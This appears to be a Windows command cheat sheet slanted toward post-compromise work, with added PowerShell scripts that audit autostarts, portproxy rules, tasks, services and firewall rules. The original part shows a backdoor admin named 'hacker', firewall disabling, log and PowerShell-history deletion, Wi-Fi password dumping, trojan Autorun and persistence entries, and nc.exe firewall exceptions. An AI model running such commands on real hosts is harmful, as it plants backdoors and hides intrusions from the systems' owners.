Run several commands on one line in Windows with & (&& runs the second only if the first succeeded)
whoami & net user
Find a file: dir /s /b c:\Content\JqueryPlug\viewer
Console code page
chcp 65001 # UTF-8
chcp 936 # GBK
Default environment variables
Variable and the path it expands to (for a system installed on C:)
%ALLUSERSPROFILE%            C:\ProgramData
%APPDATA%                    C:\Users\<username>\AppData\Roaming
%COMMONPROGRAMFILES%         C:\Program Files\Common Files
%COMMONPROGRAMFILES(x86)%    C:\Program Files (x86)\Common Files
%COMSPEC%                    C:\Windows\System32\cmd.exe
%HOMEDRIVE% / %SystemDrive%  C:
%HOMEPATH%                   \Users\<username>
%LOCALAPPDATA%               C:\Users\<username>\AppData\Local
%PROGRAMDATA%                C:\ProgramData
%PROGRAMFILES%               C:\Program Files
%PROGRAMFILES(X86)%          C:\Program Files (x86)
%PUBLIC%                     C:\Users\Public
%SystemRoot% / %WINDIR%      C:\Windows
%TEMP% / %TMP%               C:\Users\<username>\AppData\Local\Temp
%USERPROFILE%                C:\Users\<username>
Turn the firewall off (legacy netsh firewall context: XP/2003; deprecated since Vista, see the advfirewall form further down)
netsh firewall set opmode mode=disable
Turn the firewall on
netsh firewall set opmode mode=enable
Show the configured firewall rules
netsh advfirewall firewall show rule name=all
Add a port exception
netsh advfirewall firewall add rule name="HTTP" protocol=TCP dir=in localport=8080 action=allow
Delete the port exception
netsh advfirewall firewall delete rule name="HTTP" protocol=TCP dir=in localport=8080
Add a program exception
netsh advfirewall firewall add rule name="f.exe" dir=in program="e:\f.exe" action=allow
Delete the firewall log (default location; logging must be enabled for the file to exist, and it is recreated on the next write)
del C:\Windows\System32\LogFiles\Firewall\pfirewall.log
Disable a network adapter ("本地连接" is the adapter's display name, "Local Area Connection" on an English system; list them with netsh interface show interface)
netsh interface set interface "本地连接" disabled
Enable the adapter
netsh interface set interface "本地连接" enabled
Start the service behind port 445 (Server service, SMB)
net start lanmanserver
Start the service behind port 135 (RPC endpoint mapper)
net start rpcss
Let port 80 through the firewall
netsh advfirewall firewall add rule name="www" dir=in protocol=tcp localport=80 action=allow
Start the Remote Desktop services
net start "Remote Desktop Configuration"
net start "Remote Desktop Services"
net start "Remote Desktop Services UserMode Port Redirector"
Then allow connections, through the registry or through WMI:
1. REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2. wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
Create a user and add it to the Administrators group
net user hacker 123456 /add
net localgroup Administrators hacker /add
Startup items
Startup folders
Only triggered when a user logs on
Windows XP / 2003 (the folder is 「开始」菜单\程序\启动 on a Chinese-language install):
C:\Documents and Settings\<user>\Start Menu\Programs\Startup
# current user only
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
# all users
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
%programdata%\Microsoft\Windows\Start Menu\Programs\Startup
Registry locations
Most of these fire when a user logs on; Services, BootExecute, KnownDlls and the Lsa package lists are loaded at boot with no logon needed.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
HKLM\SYSTEM\CurrentControlSet\Services\
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute
HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\
HKU\.Default\Software\Microsoft\Windows\CurrentVersion\Run\
HKU\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\
HKLM\Software\Microsoft\Active Setup\Installed Components\
HKLM\SYSTEM\CurrentControlSet\Services\VxD\
HKCU\Control Panel\Desktop
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\run
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
HKLM\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\
HKLM\SOFTWARE\Classes\Protocols\Filter
HKLM\SOFTWARE\Classes\Protocols\Handler
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
HKLM\Software\Classes\Folder\Shellex\ColumnHandlers
HKCU\Software\Microsoft\Internet Explorer\UrlSearchHooks
HKLM\Software\Microsoft\Internet Explorer\Toolbar
HKLM\Software\Microsoft\Internet Explorer\Extensions
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDlls
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UIHost
HKCU\Control Panel\Desktop\Scrnsave.exe
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9
HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
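An added example, not code from the original page: a small autoruns-style audit over the logon persistence locations listed above (Startup folders and the Run / RunOnce / Policies\Explorer\Run keys), plus the Winlogon Shell and Userinit values and the HKCU ...\Windows\load and run values that win.ini entries map to. Any image outside %SystemRoot% or Program Files is flagged; that "trusted prefix" rule is an assumption made for this demo, not a Windows convention, so tune it per host. Run it from an elevated prompt so HKLM and the all-users folder are readable.

```powershell
# Added example: audit the common logon autostart locations.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
)

# Values with a known stock content; anything different deserves a look.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$hkcuWin  = 'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows'
$fixed = @(
    @{ Key = $winlogon; Name = 'Shell';    Expected = 'explorer.exe' },
    @{ Key = $winlogon; Name = 'Userinit'; Expected = "$env:SystemRoot\system32\userinit.exe," },
    @{ Key = $hkcuWin;  Name = 'Load';     Expected = '' },   # win.ini [windows] load=
    @{ Key = $hkcuWin;  Name = 'Run';      Expected = '' }    # win.ini [windows] run=
)

$startupDirs = @(
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
)

# Assumption for this demo: only these trees are considered legitimate homes.
$trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { $_.ToLower() }

function Get-ImagePath([string]$CommandLine) {
    # Executable part of a command line: the quoted path, else the first token.
    if ($CommandLine -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($CommandLine -split '\s+')[0]
}

function Test-Trusted([string]$Path) {
    if ([string]::IsNullOrWhiteSpace($Path)) { return $false }
    $p = [Environment]::ExpandEnvironmentVariables($Path).ToLower()
    foreach ($t in $trusted) { if ($p.StartsWith($t)) { return $true } }
    return $false
}

$findings = @()
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($prop in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($prop.Name -like 'PS*') { continue }      # PSPath, PSParentPath, ... are provider noise
        $findings += [pscustomobject]@{
            Source = $key; Name = $prop.Name; Command = $prop.Value
            Suspicious = -not (Test-Trusted (Get-ImagePath $prop.Value))
        }
    }
}

foreach ($f in $fixed) {
    $val = [string](Get-ItemProperty -Path $f.Key -ErrorAction SilentlyContinue).($f.Name)
    $findings += [pscustomobject]@{
        Source = $f.Key; Name = $f.Name; Command = $val
        Suspicious = ($val -ne $f.Expected)           # -ne is case-insensitive in PowerShell
    }
}

foreach ($dir in $startupDirs) {
    if (-not (Test-Path $dir)) { continue }
    Get-ChildItem -Path $dir -File -Force | Where-Object Name -ne 'desktop.ini' | ForEach-Object {
        # Anything in a Startup folder runs (or is opened) at logon, so it is always listed.
        $findings += [pscustomobject]@{
            Source = $dir; Name = $_.Name; Command = $_.FullName; Suspicious = $true
        }
    }
}

$findings | Sort-Object Suspicious -Descending | Format-Table -AutoSize -Wrap
```

The "Suspicious" column is a triage aid, not a verdict: a legitimate agent installed under C:\Users will be flagged, and a trojan copied into C:\Windows will not, so follow up on the file itself (signature, hash, timestamps) rather than on the path alone.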
System configuration files (legacy)
These files date from Windows 9x. NT-based Windows does not read them at boot: the win.ini [windows] load=/run= lines and the system.ini [boot] Shell= line are mapped into the HKCU ...\Windows NT\CurrentVersion\Windows (load, run) and Winlogon (Shell) registry values listed above, so the same entries are worth checking there.
C:\windows\win.ini
[windows]
load=xxx.exe  [the file is started in the background]
run=xxx.exe   [the file is started normally]
C:\windows\system.ini
Default:
[boot]
Shell=Explorer.exe  [Explorer.exe is the Windows program manager / Windows Explorer; this is normal]
Modified to start an extra file:
[boot]
Shell=Explorer.exe xxx.exe  [many viruses used this: xxx.exe starts together with Explorer and is easy to miss]
Note: unlike WIN.INI, the SYSTEM.INI Shell= line designates only one program. Do not replace Shell=Explorer.exe xxx.exe with Shell=xxx.exe, which leaves Windows without a desktop.
wininit.ini
WinInit is the Windows Setup Initialization Utility. Before Windows loads it executes a list of file operations (copy, delete, rename) so that files that would otherwise be in use can be replaced.
File format:
[rename]
xxx1=xxx2
meaning: copy file xxx2 over xxx1 (xxx1 is overwritten).
To delete a file:
[rename]
nul=xxx2
All file names must be full paths.
winstart.bat
A batch file run at system start, mainly used to copy and delete files, for example to clean up leftovers after a program is uninstalled.
Example:
@if exist C:\WINDOWS\TEMP\xxxx.BAT call C:\WINDOWS\TEMP\xxxx.BAT
which runs xxxx.BAT if it exists.
userinit.ini
Also used by some viruses as a start-up vector, in the same way as SYSTEM.INI.
autoexec.bat
A common start-up vector: viruses put commands into AUTOEXEC.BAT, for example format c: /y, and they run before the system comes up.
Group Policy
Scheduled tasks
Using the screen saver
A Windows screen saver is a *.scr file, which is an ordinary executable PE file: a *.scr renamed to *.exe still runs, and an *.exe renamed to *.scr still runs.
The path to it is the SCRNSAVE.EXE=xxx entry, in System.ini on Windows 9x and in HKCU\Control Panel\Desktop (listed above) on NT-based Windows, for example:
SCRNSAVE.EXE=%SystemRoot%\System32\xxxx.scr
It only fires when ScreenSaveActive=1 in the same key and the ScreenSaveTimeOut idle period has elapsed.
Starting by changing the extension
Drivers
AutoRun.inf
Autorun.inf is read when a disc is inserted: the drive uses its contents to decide whether to open what is on the disc automatically. Its contents are usually:
[AUTORUN]
OPEN=filename.exe
ICON=icon.ico
1. For a trojan xxx.exe, Autorun.inf can read:
[AUTORUN]
OPEN=Windows\xxx.exe
ICON=xxx.exe
Then every double-click on drive C: runs the trojan xxx.exe.
2. With Autorun.inf in the root of C: containing:
[AUTORUN]
OPEN=D:\xxx.exe
ICON=xxx.exe
a double-click on C: runs xxx.exe from drive D:.
Caveat: since Windows 7 (and update KB971029 for XP/Vista) AutoRun is honoured only for optical media, so an Autorun.inf on a hard disk or USB stick is no longer executed.
Run a program silently with VBS
set ws=WScript.CreateObject("WScript.Shell")
ws.Run "d:\yy.bat",0
Save this as a .vbs file; d:\yy.bat is the path of the batch file to run, and the window style 0 hides its console window.
Port forwarding
# Forward local port 80 to 192.168.204.132:8000: anything that connects to 127.0.0.1:80 on this host is relayed to 192.168.204.132:8000
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=80 connectaddress=192.168.204.132 connectport=8000
# listenaddress=0.0.0.0 would expose the forwarder on every interface; the IP Helper service (iphlpsvc) must be running for portproxy to work at all
Show IPv4-to-IPv4 forwarders
netsh interface portproxy show v4tov4
Delete the forwarder added above
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=80
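An added example, not code from the original page: netsh persists portproxy rules under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy, and the IP Helper service re-creates the listeners from there at every boot, which is what makes this a durable pivot. The script below reads every rule straight from that key (one value per rule, name "listenaddr/listenport", data "connectaddr/connectport"), checks whether a socket is really listening on each port, and cross-checks against what netsh reports. Get-NetTCPConnection needs Windows 8 / Server 2012 or later; reading the key does not need elevation.

```powershell
# Added example: list persisted portproxy forwarders from the registry.
$base = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy'

function Get-PortProxyRule {
    if (-not (Test-Path $base)) { return }
    # Leaf keys are named tcp under v4tov4, v4tov6, v6tov4 and v6tov6.
    Get-ChildItem -Path $base -Recurse | Where-Object PSChildName -eq 'tcp' | ForEach-Object {
        $mode  = Split-Path -Leaf $_.PSParentPath
        $props = Get-ItemProperty -Path $_.PSPath
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }          # provider metadata, not a rule
            $listenAddr,  $listenPort  = $p.Name  -split '/'
            $connectAddr, $connectPort = $p.Value -split '/'
            [pscustomobject]@{
                Mode        = $mode
                ListenAddr  = $listenAddr
                ListenPort  = [int]$listenPort
                ConnectAddr = $connectAddr
                ConnectPort = [int]$connectPort
                Listening   = [bool](Get-NetTCPConnection -LocalPort ([int]$listenPort) -State Listen -ErrorAction SilentlyContinue)
            }
        }
    }
}

$rules = @(Get-PortProxyRule)
"IP Helper service (iphlpsvc): $((Get-Service iphlpsvc).Status)"
if ($rules.Count -eq 0) { 'No portproxy rules persisted in the registry.' } else { $rules | Format-Table -AutoSize }

# What netsh shows should match the registry; a rule present in one place only
# means someone edited the other side by hand.
netsh interface portproxy show all
```

A rule that is in the registry but shows Listening = False usually means iphlpsvc is stopped; a listener on the port with no registry rule is a different process entirely and should be looked up with Get-NetTCPConnection's OwningProcess.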
Start a batch script with administrator rights (through UAC): the runas verb makes UAC show its consent prompt for cmd.exe, which then re-runs this script (%~s0) elevated. It prompts the user; it is not a UAC bypass.
https://www.jb51.net/article/67623.htm
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
List scheduled tasks
GUI: taskschd.msc
Command line: schtasks
Create a scheduled task
https://www.cnblogs.com/mq0036/p/6761684.html
https://www.cnblogs.com/lostyue/archive/2011/10/24/2223166.html
schtasks /create /sc minute /tn "hacker" /ru system /tr calc.exe
# runs calc.exe as SYSTEM once every minute (/mo N changes the interval); give /tr a full path
# or, as the current user: schtasks /create /sc minute /tn "hacker" /ru %username% /tr calc.exe
Delete the scheduled task
schtasks /delete /tn "hacker" /f
Create a service
# create a service named hacker; sc requires the space after binPath= and start=
# the binary must speak the service control protocol, otherwise the SCM starts it and kills it again after the start timeout (error 1053)
sc create hacker binPath= D:\test\test.exe start= auto
Delete the service
sc delete hacker
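An added example, not code from the original page: the audit side of the two commands above. It lists enabled scheduled tasks and all services whose executable sits outside the Windows or Program Files trees, which is where `schtasks /create ... /tr` and `sc create ... binPath=` from this page would leave one; a bare image name such as calc.exe is flagged as well because it resolves through PATH. The trusted prefixes are an assumption for this demo. Needs the ScheduledTasks module (Windows 8 / Server 2012 or later) and an elevated prompt.

```powershell
# Added example: find tasks and services whose binary lives in an unusual place.
$trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { $_.ToLower() }

function Test-Trusted([string]$Path) {
    if ([string]::IsNullOrWhiteSpace($Path)) { return $false }
    $p = [Environment]::ExpandEnvironmentVariables($Path).Trim('"').ToLower()
    foreach ($t in $trusted) { if ($p.StartsWith($t)) { return $true } }
    return $false
}

# Scheduled tasks: one row per Exec action (COM-handler actions have no Execute).
$tasks = Get-ScheduledTask | Where-Object State -ne 'Disabled' | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }
        [pscustomobject]@{
            Type       = 'Task'
            Name       = "$($task.TaskPath)$($task.TaskName)"
            RunAs      = $task.Principal.UserId
            Image      = $action.Execute
            Arguments  = $action.Arguments
            Suspicious = -not (Test-Trusted $action.Execute)
        }
    }
}

# Services: Win32_Service.PathName is the raw binPath=, quoted or not.
$services = Get-CimInstance Win32_Service | ForEach-Object {
    # Quoted path first; otherwise cut " -k ..." / " /arg" style arguments off.
    $exe = if ($_.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($_.PathName -split ' -| /')[0] }
    [pscustomobject]@{
        Type       = 'Service'
        Name       = $_.Name
        RunAs      = $_.StartName
        Image      = $exe
        Arguments  = $_.PathName
        Suspicious = -not (Test-Trusted $exe)
    }
}

@($tasks) + @($services) | Where-Object Suspicious | Sort-Object Type, Name |
    Format-Table Type, Name, RunAs, Image, Arguments -AutoSize -Wrap
```

A task running as SYSTEM (RunAs = SYSTEM) from a user-writable path is the combination to look at first; for services, also compare Win32_Service.StartName and the lack of a Description, which `sc create` never sets.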
File extension association
# associate an extension: .abc files are then opened as batch files
assoc .abc=batfile
# remove the association
assoc .abc=
# per-user overrides, which take precedence over HKCR, live under:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Overwrite free space to destroy traces of deleted files
cipher /w:D:\tools
# overwrites only the unallocated space of the volume that holds D:\tools; it does not touch existing files, so delete them first
Delete the PowerShell command history (PSReadLine)
del C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# for the current user, whoever that is: del %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Show saved Wi-Fi passwords
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
# typed directly at a cmd prompt; in a .bat file write %%i and %%j, and skip=9 depends on the language of the netsh output
Compression
compact  # NTFS file compression, not an archiver
makecab c:\jboss\bin\1.dmp 1.zip  # makecab writes a CAB archive whatever extension you give it
Decompression
expand 1.zip 1.dmp
Start cmd as another user
runas /user:Win-200\administrator cmd
# runas asks for the password interactively; it cannot be passed on the command line
Turn the firewall off
- Windows 2003 and earlier:
netsh firewall set opmode disable
- After Windows 2003:
netsh advfirewall set allprofiles state off
Change firewall rules
Windows 2003 and earlier
- allow all connections for a program:
netsh firewall add allowedprogram c:\nc.exe "allow nc" enable
After Windows 2003
- allow a program inbound:
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="c:\nc.exe"
- allow a program outbound:
netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="c:\nc.exe"
- allow port 3389:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
Change where the firewall log is written
netsh advfirewall set currentprofile logging filename "c:\windows\temp\fw.log"
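An added example, not code from the original page: the read-back side of the netsh commands above. It shows per profile whether the firewall is on, the default inbound action and where the log goes, then lists every enabled inbound allow rule with the program or port it opens. Rules with no DisplayGroup were added by hand (netsh advfirewall firewall add rule or New-NetFirewallRule) rather than by a Windows feature, so they are listed separately; the "outside system directories" check for program rules is an assumption made for this demo. Needs the NetSecurity module (Windows 8 / Server 2012 or later).

```powershell
# Added example: audit firewall state, logging and hand-added inbound allow rules.
Get-NetFirewallProfile |
    Select-Object Name, Enabled, DefaultInboundAction, LogFileName, LogAllowed, LogBlocked |
    Format-Table -AutoSize

function Get-InboundAllowRule {
    Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True | ForEach-Object {
        $app  = $_ | Get-NetFirewallApplicationFilter
        $port = $_ | Get-NetFirewallPortFilter
        [pscustomobject]@{
            Name     = $_.DisplayName
            Group    = $_.DisplayGroup
            Profile  = $_.Profile
            Program  = $app.Program              # "Any" when the rule is not program-scoped
            Protocol = $port.Protocol
            Port     = ($port.LocalPort -join ',')
        }
    }
}

$rules = @(Get-InboundAllowRule)

"--- hand-added inbound allow rules (no DisplayGroup) ---"
$rules | Where-Object { -not $_.Group } | Sort-Object Name |
    Format-Table Name, Profile, Program, Protocol, Port -AutoSize -Wrap

# A program rule is only as safe as the file it points at: show the ones whose
# executable is outside the Windows / Program Files trees (demo assumption).
"--- program rules pointing outside system directories ---"
$rules | Where-Object { $_.Program -and $_.Program -ne 'Any' } |
    Where-Object {
        $p = [Environment]::ExpandEnvironmentVariables($_.Program).ToLower()
        -not ($p.StartsWith($env:SystemRoot.ToLower()) -or $p.StartsWith($env:ProgramFiles.ToLower()))
    } | Format-Table Name, Program -AutoSize -Wrap
```

The per-rule filter lookups are slow on a host with hundreds of rules; for a one-off check that is acceptable, and it keeps the script readable.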
Enable Remote Desktop
- Windows 2003:
wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
- Windows 2008:
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
- Windows 2012 (this requires Network Level Authentication on the RDP-Tcp listener; RDP itself is still switched on with setallowtsconnections 1 as above):
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
Allow more than one session per user:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
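An added example, not code from the original page: the same change done from PowerShell, with a read-back so the result is verified instead of assumed. It flips fDenyTSConnections, sets the UserAuthentication flag that setuserauthenticationrequired toggles, writes fSingleSessionPerUser as the reg add line above does, and opens the firewall through the built-in Remote Desktop rule group (language-neutral group name @FirewallAPI.dll,-28752) instead of adding a new 3389 rule. Run it elevated; Get-NetTCPConnection and the NetSecurity cmdlets need Windows 8 / Server 2012 or later.

```powershell
# Added example: enable Remote Desktop and read the resulting state back.
$ts       = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$rdpTcp   = "$ts\WinStations\RDP-Tcp"
$rdpGroup = '@FirewallAPI.dll,-28752'     # the "Remote Desktop" rule group, any UI language

function Enable-Rdp {
    param([switch]$RequireNla, [switch]$MultipleSessionsPerUser)
    Set-ItemProperty -Path $ts -Name fDenyTSConnections -Value 0 -Type DWord
    # UserAuthentication 1 = NLA required, same as setuserauthenticationrequired 1
    Set-ItemProperty -Path $rdpTcp -Name UserAuthentication -Value ([int]$RequireNla.IsPresent) -Type DWord
    # fSingleSessionPerUser 0 = a user may hold several sessions at once
    Set-ItemProperty -Path $ts -Name fSingleSessionPerUser -Value ([int](-not $MultipleSessionsPerUser)) -Type DWord
    Enable-NetFirewallRule -Group $rdpGroup
    Start-Service TermService
}

function Get-RdpState {
    $ctl = Get-ItemProperty -Path $ts
    $ws  = Get-ItemProperty -Path $rdpTcp
    [pscustomobject]@{
        Enabled             = ($ctl.fDenyTSConnections -eq 0)
        NlaRequired         = ($ws.UserAuthentication -eq 1)
        MultiSessionPerUser = ($ctl.fSingleSessionPerUser -eq 0)
        Port                = $ws.PortNumber
        FirewallRuleOn      = [bool](Get-NetFirewallRule -Group $rdpGroup -Enabled True -ErrorAction SilentlyContinue)
        Listening           = [bool](Get-NetTCPConnection -LocalPort $ws.PortNumber -State Listen -ErrorAction SilentlyContinue)
        TermService         = (Get-Service TermService).Status
    }
}

Enable-Rdp -RequireNla
Get-RdpState
```

Get-RdpState on its own is also the quickest way to check a host someone else "enabled RDP" on: Enabled = True with Listening = False usually means TermService is stopped, and NlaRequired = False is the setting to fix before exposing the port.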